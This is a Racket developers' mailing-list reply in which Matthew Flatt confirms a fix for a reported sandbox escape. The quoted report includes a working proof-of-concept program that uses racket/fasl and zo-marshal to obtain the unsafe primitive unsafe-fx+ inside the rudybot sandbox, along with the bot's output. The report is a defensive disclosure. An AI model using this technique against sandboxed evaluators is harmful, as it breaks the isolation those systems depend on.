[racket-dev] racket/fasl allows sandbox escape

From: Matthew Flatt (mflatt at cs.utah.edu)
Date: Thu Jul 10 02:36:36 EDT 2014

Previous message: [racket-dev] racket/fasl allows sandbox escape
Next message: [racket-dev] racket/fasl allows sandbox escape
Messages sorted by: [date] [thread] [subject] [author]

I've pushed a repair. To double-check it, change 1140 to something like
1340, since the table of primitives changed as part of the repair.

Thanks for the report!

At Wed, 9 Jul 2014 09:39:50 -0400, Sam Tobin-Hochstadt wrote:
> The following exchange with rudybot, which is running the programs in
> a sandbox, demonstrates the issue:
> 
> 09:35 <samth> rudybot: eval (let () (local-require compiler/zo-marshal
> compiler/zo-structs racket/fasl) (fasl->s-exp (zo-marshal
> (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t (install-value 1
> 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> 09:35 <rudybot> samth: ; Value: #<procedure:unsafe-fx+>
> 09:36 <samth> rudybot: eval ((let () (local-require
> compiler/zo-marshal compiler/zo-structs racket/fasl) (fasl->s-exp
> (zo-marshal (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t
> (install-value 1 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
> vector-ref vector-ref)
> 09:36 <rudybot> samth: ; Value: 32681168
> 
> The relevant program is:
> 
> (let ()
>   (local-require compiler/zo-marshal compiler/zo-structs racket/fasl)
>   (fasl->s-exp (zo-marshal
>                       (compilation-top 3
>                          (prefix 0 '() '())
>                          (let-void 1 #t (install-value 1 0 #t (primval
> 1140) (localref #t 0 #f #f #f )))))))
> 
> Sam
> _________________________
>   Racket Developers list:
>   http://lists.racket-lang.org/dev

Posted on the dev mailing list.

Previous message: [racket-dev] racket/fasl allows sandbox escape
Next message: [racket-dev] racket/fasl allows sandbox escape
Messages sorted by: [date] [thread] [subject] [author]